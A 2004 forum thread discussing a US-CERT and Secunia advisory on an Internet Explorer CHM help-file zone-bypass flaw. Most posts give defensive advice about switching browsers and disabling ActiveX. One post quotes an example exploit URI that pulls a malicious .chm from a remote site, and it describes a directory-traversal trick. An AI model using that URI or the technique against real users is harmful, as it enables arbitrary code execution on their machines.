Skip to comments.
US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)
CERT ^
| 04/05/2004
| Art Manion
Posted on 04/08/2004 12:56:30 PM PDT by Salo
click here to read article
Navigation: use the links below to view more comments.
first 1-20, 21-22 next last
Beware.
1
posted on
04/08/2004 12:56:31 PM PDT
by
Salo
To: rdb3; Bush2000; ShadowAce; Ernest_at_the_Beach; TechJunkYard; Swordmaker
Pinging the Penguin Pinger and other interested parties.
2
posted on
04/08/2004 12:58:10 PM PDT
by
Salo
(Revenge is for those too weak to hold a grudge.)
To: All
3
posted on
04/08/2004 12:59:01 PM PDT
by
Support Free Republic
(If Woody had gone straight to the police, this would never have happened!)
To: Salo
Can you or someone please translate this for me?
Carolyn
4
posted on
04/08/2004 12:59:17 PM PDT
by
CDHart
To: Salo
Thank you.
5
posted on
04/08/2004 1:02:14 PM PDT
by
lilylangtree
(Veni, Vidi, Vici)
To: Salo
One of many. Not sure if its going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).
6
posted on
04/08/2004 1:02:47 PM PDT
by
sigSEGV
To: CDHart
Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.
7
posted on
04/08/2004 1:04:24 PM PDT
by
sigSEGV
To: sigSEGV
Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.
To: TechJunkYard
This is the secunia advisory for the same problem:
Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07
http://secunia.com/advisories/10523/ Critical:
Highly critical
Impact: Security Bypass
Where: From remote
Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.
Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and
"mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.
Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.
However, there exists two problems within the handling of "CHM" files:
1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.
This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.
2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.
Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!
http://[malicious_site]//malicious.chm::/evil.html" The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.
Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.
Use another product.
Provided and/or discovered by:
Originally reported by Arman Nayyeri.
Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.
Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/ US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070
9
posted on
04/08/2004 1:48:21 PM PDT
by
Salo
(Revenge is for those too weak to hold a grudge.)
To: John Robinson; B Knotts; stainlessbanner; TechJunkYard; ShadowAce; Knitebane; AppyPappy; jae471; ...
The Penguin Ping.
Wanna be Penguified? Just holla!
Got root?
10
posted on
04/08/2004 2:05:22 PM PDT
by
rdb3
(The cornrows are gone, so now they call me "Slim Fadey"... † <><)
To: Salo
This bears repeating:
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References
11
posted on
04/08/2004 3:22:21 PM PDT
by
zeugma
(The Great Experiment is over.)
To: zeugma
This bears repeating: Use a different web browser
In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.
12
posted on
04/08/2004 5:09:04 PM PDT
by
PAR35
To: zeugma
This bears repeating: Use a different web browser
Don't you mean use a different OS??
Linux, OS X, Beos, DOS, Commodore 64??
13
posted on
04/08/2004 6:26:35 PM PDT
by
amigatec
(There are no significant bugs in our software... Maybe you're not using it properly.- Bill Gates)
To: Support Free Republic
Earlier, when I first opened this thread, my Norton interecpted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"
You dont' think you're sending this, do you?
14
posted on
04/08/2004 7:17:02 PM PDT
by
ninenot
(Minister of Membership, TomasTorquemadaGentlemen'sClub)
To: sigSEGV
15
posted on
04/09/2004 3:13:17 AM PDT
by
CDHart
To: amigatec
Don't you mean use a different OS??Linux, OS X, Beos, DOS, Commodore 64??
Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)
16
posted on
04/09/2004 5:59:28 AM PDT
by
zeugma
(The Great Experiment is over.)
To: Salo
Surprise, Surprise, Surprise...
17
posted on
04/09/2004 4:49:05 PM PDT
by
AFreeBird
(your mileage may vary)
To: zeugma
Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.
18
posted on
04/09/2004 4:52:07 PM PDT
by
AFreeBird
(your mileage may vary)
To: rdb3
Now that is a ironic pic!
I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.
A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?
I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).
19
posted on
04/09/2004 5:04:24 PM PDT
by
CyberCowboy777
(We should never ever apologize for who we are, what we believe in, and what we stand for.)
To: sigSEGV
I personally cannot stand my browser and email mixed so I run Firefox at home, but still is not in a place for me to install it on my clients systems.
You must remember that many of the exploits of IE are because of the features of IE. Feature we use everyday that seem simple but when you are use to them it is hard to do without.
I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)
20
posted on
04/09/2004 5:08:53 PM PDT
by
CyberCowboy777
(We should never ever apologize for who we are, what we believe in, and what we stand for.)
Navigation: use the links below to view more comments.
first 1-20, 21-22 next last
Disclaimer:
Opinions posted on Free Republic are those of the individual
posters and do not necessarily represent the opinion of Free Republic or its
management. All materials posted herein are protected by copyright law and the
exemption for fair use of copyrighted works.
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson